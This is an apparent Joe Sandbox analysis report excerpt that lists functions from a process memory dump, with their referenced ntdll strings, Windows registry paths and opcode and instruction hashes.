Instruction Fuzzy Hash: 17A16A769156299BDB21DB64CC88BEAF7B8FF44700F1006E9E909A7250E735AEC4CF50

Function 05BACCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON

Download Yara Rule

Strings

@, xrefs: 05BACD63
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 05BACD34
InstallLanguageFallback, xrefs: 05BACD7F

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 7a1fe302ed6f7e36ee47b1ed7587ca65575d985bb6bd9db2e4896cf4ffb81834
Instruction ID: 31542fcf592a9184cbea695a4917d78e5a36b05272c85ba50f2f8dfe18e2fc0b
Opcode Fuzzy Hash: 7a1fe302ed6f7e36ee47b1ed7587ca65575d985bb6bd9db2e4896cf4ffb81834
Instruction Fuzzy Hash: 9551B17A6083459BC710DF64C844A7BB7E8FF88614F451DAEF985D7290E730EA04C762

Function 05BEC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 05C282E8
Failed to reallocate the system dirs string !, xrefs: 05C282D7
LdrpInitializePerUserWindowsDirectory, xrefs: 05C282DE

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 47ea39ba9505208fb028ee0fcf2492c4f02e605186169a64833b6cd211cef3ee
Instruction ID: 6b7e8f843b6e196519e13b1c367b657ec1d94e888f0c24c125b9c860f82d6b74
Opcode Fuzzy Hash: 47ea39ba9505208fb028ee0fcf2492c4f02e605186169a64833b6cd211cef3ee
Instruction Fuzzy Hash: B541E2B6654310EBC720EBA4D846B6B7FE8FB84654F09496AB98593250EB70F800CBD5

Function 05C6C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 05C6C212
@, xrefs: 05C6C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 05C6C1C5

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 333e07c93f3e2fec53c231d5137536e12356c5b6dcd51dfec4f5e9735f448c0e
Instruction ID: 53c74291e60ef98b0e4db75469a1bf53c113bcb3ed35febd9a566153b0e56e02
Opcode Fuzzy Hash: 333e07c93f3e2fec53c231d5137536e12356c5b6dcd51dfec4f5e9735f448c0e
Instruction Fuzzy Hash: C4416F72E0020AEBDF11DBD8C885FEEB7B9BB14704F1444AAEA45A7290D774AF44CB50

Function 05C34755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 05C3488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05C34888
minkernel\ntdll\ldrredirect.c, xrefs: 05C34899

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 966e55293a41168cfc8745610109d74e4b457e8d112b2c77789d4c7e80991a7c
Instruction ID: f475daec4badce638a26a60883d51ca9511da64b2f454ab2d61da95b2a2bebc9
Opcode Fuzzy Hash: 966e55293a41168cfc8745610109d74e4b457e8d112b2c77789d4c7e80991a7c
Instruction Fuzzy Hash: FD41D332A142589FCF29CE69D88AE267FF5FF4A754B050959EC49D7311D730E900CB82

Function 05C44144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 05C44225
LdrpResValidateFilePath Exit, xrefs: 05C44172
LdrpResValidateFilePath Enter, xrefs: 05C44160

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 519fd387591fd8934440ae33faad0c2205f77ae7298a2eaffffdd979eb8b5f8f
Instruction ID: 5180dc26df2999042dc2ae2ec5ac7e6b1e2bfdf699e5ae44cce8bb54a6a41ee7
Opcode Fuzzy Hash: 519fd387591fd8934440ae33faad0c2205f77ae7298a2eaffffdd979eb8b5f8f
Instruction Fuzzy Hash: CF41C171A046588BEF29DB95C884FADBBF5FF45340F24089AD902EB791DB759A01CF10

Function 05C320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 05C32104
Process initialization failed with status 0x%08lx, xrefs: 05C320F3
LdrpInitializationFailure, xrefs: 05C320FA

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: bc0e3a8de134e928a6f327087322b1090e98342f184013fbe10efa150d9d2c15
Instruction ID: bbb685d39ea5bb7386c811ba17b8a49dead9f9dfef97238963c6c1c7af125afd
Opcode Fuzzy Hash: bc0e3a8de134e928a6f327087322b1090e98342f184013fbe10efa150d9d2c15
Instruction Fuzzy Hash: 9BF0C875750248BBDF14EA8CCD57FBA7B68EB40B54F1004A5F6007B285D5B0BA00D6D1

Function 05BC03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 05C14D8A

Strings

#%u, xrefs: 05C14D82

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 9372e80a7f08d0d94b2c2ff08c3fc9fca657a1197054fb95f30554621986d430
Instruction ID: 2de821861cb47f456743404e8e2dcc8a5e751b69688a4cf51e8d1b6d15da8079
Opcode Fuzzy Hash: 9372e80a7f08d0d94b2c2ff08c3fc9fca657a1197054fb95f30554621986d430
Instruction Fuzzy Hash: D3714B71A001499FCF05DFA8C995FAEBBF9BF08744F1444A9E905E7251EA34EE01CBA4

Function 05C3CEA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 05C3CFBD

Strings

@, xrefs: 05C3CF0A

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @
API String ID: 4062629308-2766056989
Opcode ID: fc934502ebcd370910040a521f0904a1e0fba782d45b7be1aab484dd19bafc3e
Instruction ID: 3621870e11728c22a30ca941246132b6b41b5ba134e01ec33ad856dea5184062
Opcode Fuzzy Hash: fc934502ebcd370910040a521f0904a1e0fba782d45b7be1aab484dd19bafc3e
Instruction Fuzzy Hash: 6441D071A04218DFCB21DFA5C845AAEBFB9FF44B44F0048AAE916DB250D774D940DB64

Function 05BBA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 05BBAA25
LdrResSearchResource Enter, xrefs: 05BBAA13

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: c106e8430f111e4640543c2160e9f15d4f03c6e47f6ae999b918ce3683119dc2
Instruction ID: 9c5707646c9ffa066490d9577b082b1d3f1733ed56eee702a78804d410eedd0e
Opcode Fuzzy Hash: c106e8430f111e4640543c2160e9f15d4f03c6e47f6ae999b918ce3683119dc2
Instruction Fuzzy Hash: 39E18E75E04258ABEF21CA99C984BFEB7BAFF05714F1048A9EC11E7250D7F4A940DB24

Function 05C7A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 05C7A44B
`, xrefs: 05C7A551

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 8df0841faf13320a4ea21db4029ba96e15813445a24f336c17d1261680c3796f
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 44C1CE3120834A9BDB24CF29CC45B2BBBE6FF84314F084E2DF5968A690D775E645CB45

Function 05C2E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 05C2E75A
UEFI, xrefs: 05C2E751

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 1bc40c8bd1c03fb02ecca7299ba055b392246dec1f0f5e70069693070a5c0902
Instruction ID: 21aa378cc86fe4ab92cfef1b1689d306015672acb5a594a419283ed86ab95548
Opcode Fuzzy Hash: 1bc40c8bd1c03fb02ecca7299ba055b392246dec1f0f5e70069693070a5c0902
Instruction Fuzzy Hash: DA617D71E047299FDB24DFA9C884BBEBBB9FB44700F14486DE649EB291D731A940CB50

Function 05BBAC50 Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

LdrpResGetMappingSize Enter, xrefs: 05BBAC6A
LdrpResGetMappingSize Exit, xrefs: 05BBAC7C

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
API String ID: 0-1497657909
Opcode ID: ad64f0fb089620bab174dc7ac0280b15c800ce5fcb488b64113d42205b732bcc
Instruction ID: 2e026ac70d5061e9e6f2457aecdadba2e9993bbdac2207e71f68da11a5dfb2aa
Opcode Fuzzy Hash: ad64f0fb089620bab174dc7ac0280b15c800ce5fcb488b64113d42205b732bcc
Instruction Fuzzy Hash: C061BE71E046889BEB11DFA8C881BFDB7B6FF05715F0449A9E801AB290D7F4E940C724

Function 05BE4C59 Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

Flst, xrefs: 05BE4C96
0, xrefs: 05BE4CC3

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 494b5ea15c5afe915f13f4d517141c80acc1f218e9d637cb41acbae60105c949
Instruction ID: c7acd91e1282120a6d672b933b1784c5c78dd29b6cf371e930b094e6b85fa846
Opcode Fuzzy Hash: 494b5ea15c5afe915f13f4d517141c80acc1f218e9d637cb41acbae60105c949
Instruction Fuzzy Hash: 2F515CB1A00258CBCF25CF95C585A69FBF6FF44714F19C4AED04A9B250EB74AD85CB80

Function 05BB04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 05BB063D
kLsE, xrefs: 05BB0540

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 1ccb8ca645d5dae835acd91a898f6469bb5c7eb4888eaf85401739c7464aa951
Instruction ID: 1d8a583b69ef9aaf2437db1b6fd68517ad973e401ef252292813c228a4292404
Opcode Fuzzy Hash: 1ccb8ca645d5dae835acd91a898f6469bb5c7eb4888eaf85401739c7464aa951
Instruction Fuzzy Hash: B4519A7160474A8BE724EF65C488AF7B7E5FF84304F00486EE5AA87640E7F0A645CB92

Function 05BE2E9C Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

RtlpInsertAssemblyStorageMapEntry, xrefs: 05C22807
SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 05C2280C

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
API String ID: 0-2104531740
Opcode ID: 13df3978ddd4f0c0369e588424cff26db2049be3cf7bff1a5af0b16e72c82d1a
Instruction ID: bc922f5dd4b173f64625a39d8df88be6459e888975e574bb2cb5bbe3d7cad46c
Opcode Fuzzy Hash: 13df3978ddd4f0c0369e588424cff26db2049be3cf7bff1a5af0b16e72c82d1a
Instruction Fuzzy Hash: 1941023A608625EBCB28CF55C840E7AF3BAFF94B10F25846DE8458B650D730ED41CBA0

Function 05BBA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 05BBA2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 05BBA309

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 0261449f15f076a1908e80e35585fb64064334e863f84a57892eae1f1a941618
Instruction ID: 73c6638e2519bf0936c76e1cd3c284eefc789ddd489f9e19463bfd9137220e9f
Opcode Fuzzy Hash: 0261449f15f076a1908e80e35585fb64064334e863f84a57892eae1f1a941618
Instruction Fuzzy Hash: B141BE39A08649DBEB21CF5AC584BBD77B5FF85700F1445A9EC02DB690E2F5EA00CB54

Function 05BF0FF6 Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control, xrefs: 05BF1025
@, xrefs: 05BF1050

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: @$\Registry\Machine\System\CurrentControlSet\Control
API String ID: 0-2976085014
Opcode ID: 26d763583c624c202fddc842551aafe841297c96f8b3256a48399b33bbb9ea57
Instruction ID: 1e34c0465b2d9aafcbb2521219f6413b304c252f39022a4f1430b46e41bc71e1
Opcode Fuzzy Hash: 26d763583c624c202fddc842551aafe841297c96f8b3256a48399b33bbb9ea57
Instruction Fuzzy Hash: C5318672A40549EBDB21DFA5CC48E9FBBBDEB84750F0004A5E601A7250D774ED05CBA0

Function 05BEA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 05BEA5E4
Threadpool!, xrefs: 05BEA5E9

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 8ef68b317bf936100217b44510b75072f56a40951f2f2102c0547bed77118e22
Instruction ID: b0067940e7a0650c8e5b67ee57f1630b9c85b6a16f2b1a237a9a5dc47e5e7b3b
Opcode Fuzzy Hash: 8ef68b317bf936100217b44510b75072f56a40951f2f2102c0547bed77118e22
Instruction Fuzzy Hash: 9201ADB2654704AFD311DF14CE4AB267BE8E786B19F0989B9A558C7190E734F804CB46

Function 05BBC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 05BBC8C3, 05BBCA40

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 8a5c143d99f77acc4b9f62b98a1337c7339babce6b2c8cc5bd5be2f1e3153b9e
Instruction ID: 6c8e397caebe6f61cdfd2c20da1bdda1e4df2a9bce9e9acb9964fe4ca57190fb
Opcode Fuzzy Hash: 8a5c143d99f77acc4b9f62b98a1337c7339babce6b2c8cc5bd5be2f1e3153b9e
Instruction Fuzzy Hash: B8821975E042199EEB24CFA9C884BFDBBB2FF44310F1481A9D85AAB250D7F4AD45CB50

Function 05BB2FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

PATH, xrefs: 05BB30D6, 05BB3124

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 5f59899de43e3ec470a44f971aff33d380ef33553b04e9c2f39ded262634fb4f
Instruction ID: 50c6daba6ef39a743a62fff983f5e3387c27cb0eb3b6481ee231ac8da6d0482f
Opcode Fuzzy Hash: 5f59899de43e3ec470a44f971aff33d380ef33553b04e9c2f39ded262634fb4f
Instruction Fuzzy Hash: 34F1A071E102199BDB24CF98D881AFEBBF5FF48704F5984A9F441AB250DBF0A941CB91

Function 05C4CC20 Relevance: 1.6, Strings: 1, Instructions: 353COMMON

Download Yara Rule

Strings

w, xrefs: 05C4D038

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: 33a42ea78ff66568053c67210c9ce820c70a382833f97adceb23b29424bad133
Instruction ID: 5e3393af075441971be4a74dedfc52eecbba472bcd63b473c39adc22dbdd56ea
Opcode Fuzzy Hash: 33a42ea78ff66568053c67210c9ce820c70a382833f97adceb23b29424bad133
Instruction Fuzzy Hash: 9AD1BD34A05215ABDB24CF55C482ABEFBB2FF44700F14C859E89A97251E335EE92DB50

Function 05C36420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 05C365C1

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2e69ab0d6cbe3a9849fa17a0b6bbd5007cb0a8f4d3a5625f2f8fdd9110c8916b
Instruction ID: 108a5fc616e8fb2ad49c95b8afa23f6a23ba1d37bd92e562defc6a84d75338dc
Opcode Fuzzy Hash: 2e69ab0d6cbe3a9849fa17a0b6bbd5007cb0a8f4d3a5625f2f8fdd9110c8916b
Instruction Fuzzy Hash: 4A919171A00219BFDB21DF95CC89FAEBBB9EF08B50F100465F601AB190D774AD40CBA0

Function 05BEA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 05C267C9

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 1f0e80199c3dcdaf5c6730b333d049583a4dd8a2d8dc04062fdeeddb2a0eb0b8
Instruction ID: 6bf4cace49857397be5eefba7d0d8ff7fd80720afb799215b4f25e7d3726e9c8
Opcode Fuzzy Hash: 1f0e80199c3dcdaf5c6730b333d049583a4dd8a2d8dc04062fdeeddb2a0eb0b8
Instruction Fuzzy Hash: E2718275E04229CFDF28CF99D590AEDBBB2FF48700F14856EE406A7640DB709981CB60

Function 05BCE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 05BCE6A4

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 55c1bde283d3a963ad63d5975098ec7669009e76d319555c608961bab45b77b6
Instruction ID: 19d031970947cd33c9e47f60e60be5d06cfbed0e953afdaf32421d0c25c1915a
Opcode Fuzzy Hash: 55c1bde283d3a963ad63d5975098ec7669009e76d319555c608961bab45b77b6
Instruction Fuzzy Hash: 49417172608301EBD722DA74C944B6BBBDCEF88614F4409EEF585E7140EA74F904C7AA

Function 05BACDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

AlternateCodePage, xrefs: 05BACDFE

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: AlternateCodePage
API String ID: 0-3889302423
Opcode ID: be7e84974d0ae54ae2f1aa0c423a029340904bf1541dea2646c5f33ca4819b99
Instruction ID: 2a1649621f90e8202642a5c78e1ccc9a8b11760682c00f6b9371f536e9006fde
Opcode Fuzzy Hash: be7e84974d0ae54ae2f1aa0c423a029340904bf1541dea2646c5f33ca4819b99
Instruction Fuzzy Hash: 6D41A176E04618ABDF24DB98CC84AFEBBB9FF84710F14459AE512A7290D670AB41CB50

Function 05C2C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 05C2C77F

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 496cc59f3f51b37dd9b719ed406af6c6ffb86bf72516e60ae574e526ad20ec22
Instruction ID: 1b7d7e46d75f7cacdec8035d2c343612407045755f2893e1d9292b3ff8b5cd53
Opcode Fuzzy Hash: 496cc59f3f51b37dd9b719ed406af6c6ffb86bf72516e60ae574e526ad20ec22
Instruction Fuzzy Hash: F04115B1D0162CAADB21DA64CC85FDEB77CAB45714F0085E5EB08A7140DB70AE898FA4

Function 05C2CCA0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

TrustedInstaller, xrefs: 05C2CCBB

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: TrustedInstaller
API String ID: 0-565535830
Opcode ID: 7ba50f20bbee806b0c4256d0d761da7a583eaed607f0cc39d2108cad5ddc59e5
Instruction ID: 2fa0a15ae59feebf5ba0266466eb7fd2345d733e96cd8b5404bb9cea029c4252
Opcode Fuzzy Hash: 7ba50f20bbee806b0c4256d0d761da7a583eaed607f0cc39d2108cad5ddc59e5
Instruction Fuzzy Hash: 7F317432A40629BFDB22DBA4CC55FEFBB7DEB44B50F0104A9FA00AB150D674AE41C790

Function 05C50F50 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

@, xrefs: 05C50FD3

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
Instruction ID: c7e6a50bfa8c0ede5773b28347a4e54e8dc64fbc556884759108e49cb96ca165
Opcode Fuzzy Hash: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
Instruction Fuzzy Hash: 31316E71118345AFD311DF54C849E9BBBE8FF84760F444E2EB6D482190E7B0EA48CB96

Function 05C4AEB0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 05C4AF2F

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 34da08ccbbfe185cdf98d33b8b8fb0c997374228dc4b04354d78bbdf8a65f251
Instruction ID: fed426e15982f9085f73a4e5ce88bcfe770fbe11dae4b20628257edaa7187309
Opcode Fuzzy Hash: 34da08ccbbfe185cdf98d33b8b8fb0c997374228dc4b04354d78bbdf8a65f251
Instruction Fuzzy Hash: 2A3133B6E40644AFDB10DF68CC45F6ABBB6FB84B14F148A65F501A7690CB38AD40CB90

Function 05BD8CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 05BD8CE7

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
Instruction ID: 22b345f991774c7001fcdc3b2876a0f406838abbe219d09aa23bc3a6f9305562
Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
Instruction Fuzzy Hash: C1212837600115BBCB22DB49C844F6BBBBDFF526A1F2544EAF9069B144E630ED0087B0

Function 05C66FF7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON

